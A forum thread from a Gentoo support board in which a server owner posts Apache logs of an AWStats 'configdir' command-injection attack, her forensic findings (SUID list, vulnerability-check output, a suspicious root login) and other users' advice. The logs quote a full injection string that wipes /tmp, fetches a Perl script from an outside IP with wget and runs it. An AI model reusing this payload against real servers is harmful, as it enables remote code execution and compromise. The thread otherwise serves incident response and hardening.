//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377  

 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET

//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET

//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  

 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET

//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.

138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502 "-"

"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET 

//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.

138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502

 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET 

/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET

/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510

 

 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 

/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 

/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787

 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET 

/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET

/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506  

 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 

/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://

80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 

787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 

/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://

80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200

787

 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 

/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 

/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508

 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 

/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 

/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516

 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 

/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 

/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516

```

1) The exploit is no longer available. Just wondering what it has done on my server.

2) Just wondering how the hell they knew about my awstats setup. I mean, you can't find my awstats URL on any search engine!

mod edit: inserted line breaks in code block for page formatting --Earthwings

----------

## newtonian

 *linux_girl wrote:*   

> holly crap me too :
> 
> 1)The exploit is no more aviable. juste wodering what it have done on my srver
> 
> 2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

 

1)Did you have an IRC server running on your system?  If you did the attackers may have been able to do more harm.

You should check for a root kit and I'd recommend changing your tmp directory so that files in tmp are no longer executable from within /tmp.  You can find directions for both in this post.

2)  I don't know about the script that attacked your system, but it is very easy to have a script attack random ip addresses.

That or maybe it was a previous or current user of your system.  Or maybe there was a short period when your awstats setup was exposed and some web bot added your address and awstats link into a search engine.

Cheers,

----------

## abaelinor

aa

Last edited by abaelinor on Mon Oct 20, 2008 8:55 pm; edited 1 time in total

----------

## linux_girl

 *newtonian wrote:*   

>  *linux_girl wrote:*   holy crap, me too:
> 
> 1) The exploit is no longer available. Just wondering what it has done on my server.
> 
> 2) Just wondering how the hell they knew about my awstats setup. I mean, you can't find my awstats URL on any search engine!
> ...

 

ANALYSIS of the break-in

WEIRD files owned by apache

The following files were all created by apache and don't match any GET activity in /var/log/apache/access.

I remember cleaning /tmp/ from time to time => removing hacker files, DAMN IT  :Sad: 

```
find / -group 81 -exec ls -gl '{}' \;
-rw-------  1 apache apache 2,1K sep 24 21:43 /tmp/sess_0569b807f3b1ee0f443ac4f703090435
-rw-------  1 apache apache   28 sep 20 21:53 /tmp/sess_0cf9d59765d44c71595229508aa4ad4c
-rw-------  1 apache apache    0 sep 21 21:21 /tmp/sess_2772093e5a5336a86386a86374cc0d24
-rw-------  1 apache apache  16K sep 27 10:32 /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402
-rw-------  1 apache apache    7 sep 11 11:41 /tmp/sess_62717f9c3a213dba20a89d94c84af0cf
-rw-------  1 apache apache 2,0K sep 14 04:24 /tmp/sess_8906480466f77adf635dea22987e2169
-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_9995800ef00b8bb382ccfd3f0a72ff1c
-rw-------  1 apache apache 2,0K sep 19 19:04 /tmp/sess_bc5702670760d3014810079849809a56
-rw-------  1 apache apache    7 sep 25 19:26 /tmp/sess_bd4ec9e8c0d1c943e4ffbcbf5b2c63ce
-rw-------  1 apache apache    7 oct  1 18:13 /tmp/sess_c3f7c383478793804b15d272cd21834f
-rw-------  1 apache apache 2,0K sep 18 02:23 /tmp/sess_d486648c6a3f8dc0b9fa7612002c42ea
-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_d6e3c88f8754240d4010bc8e7672a60d
-rw-------  1 apache apache    7 oct  1 17:05 /tmp/sess_d7d34a92d14fbf09af900f97fe6e761c
-rw-------  1 apache apache    7 sep 27 23:08 /tmp/sess_e0e884fe36e1ddc25852ccb354f6b9ea
-rw-------  1 apache apache 2,0K sep 15 19:15 /tmp/sess_e4c5c058f61fcfb41cf48735a73a7f6d
-rw-------  1 apache apache    7 sep 29 13:27 /tmp/sess_f742e0a34a022894388793c5bdbda19c
-rw-------  1 apache apache    7 oct  1 17:30 /tmp/sess_fd3587d62383ae5badfcad12c70ca359
```

SOME INBOX

```
cat /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402
sq_base_url|s:27:"http://webmail.MY_APACHE_SERVER.COM";base_uri|s:1:"/";onetimepad|s:12:
"AhobV7wnT9o=";sqimap_capabilities|a:12:{s:9:"IMAP4rev1";b:1;s:7:"UIDPLUS";b:1;s:8:"CHILDREN";b:1;s:9:"NAMESPACE";b:1;s:6: \
"THREAD";s:10:
"REFERENCES";s:4:
"SORT";b:1;s:5:"QUOTA";b:1;s:4:"IDLE";b:1;s:4:"AUTH";s:5:"PLAIN";s:3:"ACL";b:1;s:4:"ACL2"; \
s:5:"UNION";s:14:
"XCOURIEROUTBOX";
s:14:"INBOX.Outbox
";}delimiter|s:1:".";username|s:5:"pbx06";user_is_logged_in|b:1;just_logged_in|b:0;
attachment_common_types|a:6:{s:9:"text/html";b:1;s:10:"image/jpeg";b:1;s:9:"image/png";b:1;s:6:"text/*";b:1;s:7: \
"image/*";b:1;s:3:"*/*";b:1;}
attachment_common_types_parsed|a:0:{}prefs_cache|a:7:{s:17:"show_html_default";s:1:"0";s:4:"sort"; \
s:1:"0";s:13:"javascript_on";s:1:"1";s:8:"hililist";s:6:
"a:0:{}";s:12:"chosen_theme";s:24:"../themes/dark_green.php";s:10:"custom_css";s:14:"verdana-10.css"
;s:8:"show_num";s:2:"30";}
prefs_are_cached|b:1;theme_css|s:0:"";boxesnew|a:30:{i:0;a:7:
{s:3:"raw";s:45:"* LIST (\Unmarked \HasChildren) "." "INBOX"
";s:9:"formatted";s:5:"INBOX";s:14:"unformatted-dm";s:5:"INBOX";s:11:"unformatted";s:5:
"INBOX";s:16:"unformatted-disp";s:5:
"INBOX";s:2:"id";i:0;s:5:"flags";a:2:{i:0;s:8:"unmarked";i:1;s:11:"haschildren";}}i:1;a:7:
{s:3:"raw";s:44:"* LIST (\HasNoChildren) "." "INBOX.Drafts"
";s:9:"formatted";s:18:"&nbsp;&nbsp;Drafts";s:14:"unformatted-dm";s:12:"INBOX.Drafts";s:11:"unformatted";s:12:
"INBOX.Drafts";s:16:"unformatted-disp";s:12:"INBOX.Drafts";s:2:"id";i:5;s:5:
"flags";a:1:{i:0;s:13:"hasnochildren";}}i:2;a:7:
{s:3:"raw";s:42:"* LIST (\HasNoChildren) "." "INBOX.Sent"
";s:9:"formatted";s:16:"&nbsp;&nbsp;Sent";s:14:"unformatted-dm";s:10:"INBOX.Sent";s:11:"unformatted";s:10:
"INBOX.Sent";s:16:"unformatted-disp";s:10:"INBOX.Sent";s:2:"id";i:19;s:5:"flags";a:1:
{i:0;s:13:"hasnochildren";}}i:3;a:7:{s:3:"raw";s:43:"* LIST (\HasNoChildren) "." "INBOX.Trash"
";s:9:"formatted";s:17:"&nbsp;&nbsp;Trash";s:14:"unformatted-dm";s:11:"INBOX.Trash";s:11:"unformatted";s:11:
"INBOX.Trash";s:16:"unformatted-disp";s:11:"INBOX.Trash";s:2:"id";i:26;s:5:"flags";a:1:
{i:0;s:13:"hasnochildren";}}i:4;a:7:{s:3:"raw";s:51:"* LIST (\HasNoChildren) "." "INBOX.nature
...
SOME sensitive info like senders' mail addresses to be used for spam mailing
...
```

The above looks like the SquirrelMail webmail front end, but it can't be!

```

cat /tmp/sess_0569b807f3b1ee0f443ac4f703090435


```

MD5SUM

I have over 1000 files that didn't match portage !md5!

```
qpkg -v -v -c | grep "!md5!" | wc
```

including gcc/glibc, netstat, ping & a couple of /usr/linux/ C code.

chkrootkit found 0 rootkits

but it's terribly old/outdated & LAME & static

SETUID/SETGID files

found some suspicious KDE SETUID files:

```
-rws--x--x  1 root 30420 aoû 23 05:47 /bin/su
-rwsr-x--x  1 root 31056 oct 28  2004 /bin/ping
-rws--x--x  1 root 71684 fév  3  2005 /bin/mount
-rws--x--x  1 root 24752 oct 28  2004 /bin/ping6
-rws--x--x  1 root 32296 aoû 23 05:47 /bin/passwd
-rws--x--x  1 root 39848 fév  3  2005 /bin/umount
-rwxr-sr-x  1 zendtech 237732 oct  1 16:59 /opt/Zend/sbin/ini_modifier
-r-s--x--x  1 root 12608 aoû 27 23:36 /opt/vmware/bin/vmware-ping
-r-sr-xr-x  1 root 4714 aoû 27 23:36 /opt/vmware/bin/vmware
-rws--x--x  1 root 3636940 aoû 27 23:36 /opt/vmware/lib/bin/vmware-vmx
-rws--x--x  1 root 756668 jun 16 18:20 /usr/bin/gpg
-rws--x--x  1 root 49988 jui  5 03:43 /usr/bin/ksu
-r-xr-s--x  1 man 50796 sep 28 14:19 /usr/bin/man
-rws--x--x  1 root 2171160 oct  3 21:52 /usr/bin/Xorg
-rws--x--x  1 root 35524 aoû 23 05:47 /usr/bin/chfn
-rws--x--x  1 root 31520 aoû 23 05:47 /usr/bin/chsh
---s--x--x  1 root 93084 fév 11  2005 /usr/bin/sudo
-rws--x--x  1 lp 11904 mar 20  2005 /usr/bin/lppasswd
-rws--x---  1 cron 33644 mai 16 07:00 /usr/bin/crontab
-rws--x--x  1 root 41104 aoû 23 05:47 /usr/bin/chage
-rwsr-xr-x  1 root 17132 jan 30  2005 /usr/bin/eject #(setuid by me to eject USB media device easier)
-rwxr-s--x  1 tty 10652 fév  3  2005 /usr/bin/write
-rwxr-s--x  1 mail 9564 jun 11 16:36 /usr/bin/dotlock
-rwx--s--x  1 slocate 32904 fév 19  2005 /usr/bin/slocate
-rws--x--x  1 root 220424 fév 14  2005 /usr/bin/xscreensaver
---s--x--x  1 root 18876 fév 13  2005 /usr/bin/mount.cifs
-rws--x--x  1 root 24540 aoû 23 05:47 /usr/bin/expiry
-rws--x--x  1 root 26140 aoû 23 05:47 /usr/bin/newgrp
-rws--x--x  1 root 43648 aoû 23 05:47 /usr/bin/gpasswd
-rwxr-s--x  1 utmp 301020 fév 11  2005 /usr/bin/screen
---s--x--x  1 root 11280 fév 13  2005 /usr/bin/smbmnt
---s--x--x  1 root 9012 fév 13  2005 /usr/bin/smbumount
-rwxr-s--x  1 root 16000 jun 12 17:30 /usr/bin/lockfile
-rwxr-s--x  1 mail 38796 jun 14 18:23 /usr/bin/mutt_dotlock
-rws--s--x  1 root 78240 jun 12 17:30 /usr/bin/procmail
-rws--x--x  1 root 692688 mar 19  2005 /usr/kde/3.3/bin/kppp
-rws--s--x  1 root 61028 mar 19  2005 /usr/kde/3.3/bin/reslisa
-rws--x--x  1 root 702788 aoû 25 00:01 /usr/kde/3.4/bin/kppp
-rws--x--x  1 root 61148 aoû 25 00:01 /usr/kde/3.4/bin/reslisa
-rws--x--x  1 root 10997 jun 22 00:28 /usr/kde/3.4/bin/fileshareset
-rws--x--x  1 root 7692 jun 22 00:28 /usr/kde/3.4/bin/kgrantpty
-rws--x--x  1 root 6920 sep 10 10:43 /usr/kde/3.4/bin/artswrapper
-rwxr-s--x  1 nogroup 76468 jun 22 02:29 /usr/kde/3.4/bin/kdesud
-rws--x--x  1 root 14192 jun 22 02:29 /usr/kde/3.4/bin/kcheckpass
-rws--x--x  1 root 8036 jun 22 00:28 /usr/kde/3.4/bin/kpac_dhcp_helper
-rws--x--x  1 root 11788 aoû 23 07:25 /usr/lib/misc/glibc/pt_chown
-rws--x--x  1 root 152896 avr  4  2005 /usr/lib/misc/ssh-keysign
-rws--x---  1 squid 17452 mai 16 09:38 /usr/lib/squid/pam_auth
-rws--x---  1 squid 17796 mai 16 09:38 /usr/lib/squid/ncsa_auth
-r-s--x--x  1 root 18264 aoû 23 05:41 /usr/sbin/unix_chkpwd
-rwsr-xr-x  1 root 28512 fév 11  2005 /usr/sbin/fping
-rws--x---  1 wheel 20620 jun 25 20:33 /usr/sbin/traceroute
-rwxr-sr-x  1 postdrop 106348 jun 12 17:57 /usr/sbin/postdrop
-rws--x---  1 apache 13448 sep 25 08:43 /usr/sbin/suexec2
-rwxr-sr-x  1 postdrop 128244 jun 12 17:57 /usr/sbin/postqueue
-rws--x--x  1 root 11932 fév  1  2005 /usr/sbin/gnome-pty-helper
-rwxr-s--x  1 utmp 8312 mar 13  2005 /usr/sbin/utempter
-rwxr-s--x  1 mail 9476 jun 15 20:23 /usr/libexec/camel-lock-helper-1.2
-rws--x--x  1 mail 24104 jun 11 16:36 /usr/libexec/mail.local
-rwxr-s--x  1 utmp 9804 jan 31  2005 /usr/libexec/gnome-pty-helper
-rwsr-sr-t  1 users 0 jan  8  2005 /home/pbx06/.superkaramba/.lock
```

LISTENING ports

Everything seems OK except for

dnsmasq, which is a light DNS server, and which is also listening on eth0/*:33493

glsa-check'ing the BOX

Only awstats seems to be exploitable

```
glsa-check -l | grep '\[N\]'
WARNING: This tool is completely new and not very tested, so it should not be
used on production systems. It's mainly a test tool for the new GLSA release
and distribution system, it's functionality will later be merged into emerge
and equery.
Please read http://www.gentoo.org/proj/en/portage/glsa-integration.xml
before using this tool AND before reporting a bug.
[N] indicates that the system might be affected.
200509-01 [N] MPlayer: Heap overflow in ad_pcm.c ( media-video/mplayer )
200509-06 [N] Squid: Denial of Service vulnerabilities ( net-proxy/squid )
200509-08 [N] Python: Heap overflow in the included PCRE library ( dev-lang/python )
200509-10 [N] Mailutils: Format string vulnerability in imap4d ( net-mail/mailutils )
200509-13 [N] Clam AntiVirus: Multiple vulnerabilities ( app-antivirus/clamav )
200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )
200509-18 [N] Qt: Buffer overflow in the included zlib library ( x11-libs/qt )
200510-04 [N] Texinfo: Insecure temporary file creation ( sys-apps/texinfo )
200506-22 [N] sudo: Arbitrary command execution ( app-admin/sudo )
200506-23 [N] Clam AntiVirus: Denial of Service vulnerability ( app-antivirus/clamav )
200508-01 [N] Compress::Zlib: Buffer overflow ( dev-perl/Compress-Zlib )
200508-04 [N] Netpbm: Arbitrary code execution in pstopnm ( media-libs/netpbm )
200508-07 [N] AWStats: Arbitrary code execution using malicious Referrer information ( net-www/awstats )
200508-08 [N] Xpdf, Kpdf, GPdf: Denial of Service vulnerability ( kde-base/kdegraphics app-text/xpdf app-text/gpdf ... )
200508-17 [N] libpcre: Heap integer overflow ( dev-libs/libpcre )
200508-19 [N] lm_sensors: Insecure temporary file creation ( sys-apps/lm_sensors )
200507-04 [N] RealPlayer: Heap overflow vulnerability ( media-video/realplayer )
200507-10 [N] Ruby: Arbitrary command execution through XML-RPC ( dev-lang/ruby )
200507-11 [N] MIT Kerberos 5: Multiple vulnerabilities ( app-crypt/mit-krb5 )
200507-16 [N] dhcpcd: Denial of Service vulnerability ( net-misc/dhcpcd )
200507-17 [N] Mozilla Thunderbird: Multiple vulnerabilities ( mail-client/mozilla-thunderbird mail-client/mozilla-thunderbird-bin )
200507-21 [N] fetchmail: Buffer Overflow ( net-mail/fetchmail )
200507-22 [N] sandbox: Insecure temporary file handling ( sys-apps/sandbox )
200507-23 [N] Kopete: Vulnerability in included Gadu library ( kde-base/kdenetwork kde-base/kopete )
200507-25 [N] Clam AntiVirus: Integer overflows ( app-antivirus/clamav )
200507-27 [N] Ethereal: Multiple vulnerabilities ( net-analyzer/ethereal )
```

/var/log/wtmp

found one weird line: root logged in from an unknown box:

```
last -a |grep root |less
root     pts/9        Sun Sep 18 14:15 - 21:03 (1+06:47)    noc.au.SOME-HOSTNAME.net
```

What a pain to dig through all those log files: pop/smtpd/httpd/ftpd/sshd all have a different file format.

ANY suggestions?

mod edit: inserted linebreak \ for page formatting --Earthwings

----------

## linux_girl

 *newtonian wrote:*   

>  *kaidon wrote:*   If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
> 
> In this case you don't need to alter any partition tables.
> 
> Depending on what apps you're running it'll also be quite a speed up.
> ...

 

util-linux has a flaw: when a user re-mounts a partition it loses the nosuid,noexec,... options

200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )

----------

## Bob P

 *linux_girl wrote:*   

> 2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

 

I doubt that the bad guys even care to know whether or not you have an AWStats implementation running on your server when they attack it with a script exploit.  I think that they just apply a very simple brute-strength approach rather than applying knowledge specific to your system: the bad guys just crawl the web pinging for responses on port 80.  Their software pays attention when a site responds as yours did; when they find a server on port 80 they apply the worm as an HTML request, indifferent to whether you have awstats running or not.  If you DO have AWStats running with PHP enabled, then they exploit your box.  If you don't, then they don't, and they move along.  It's pretty simple, really.  It amounts to nothing more complex than picking the low-hanging fruit.   :Idea: 

My HTTP server logs show that I'm hit by requests from those worms all the time.  They never get in, but the logs still show them trying.  Maybe you should disable PHP in awstats, and generate your reports in a cron job instead.   :Idea: 

PS - could somebody fix the page formatting problem?

----------

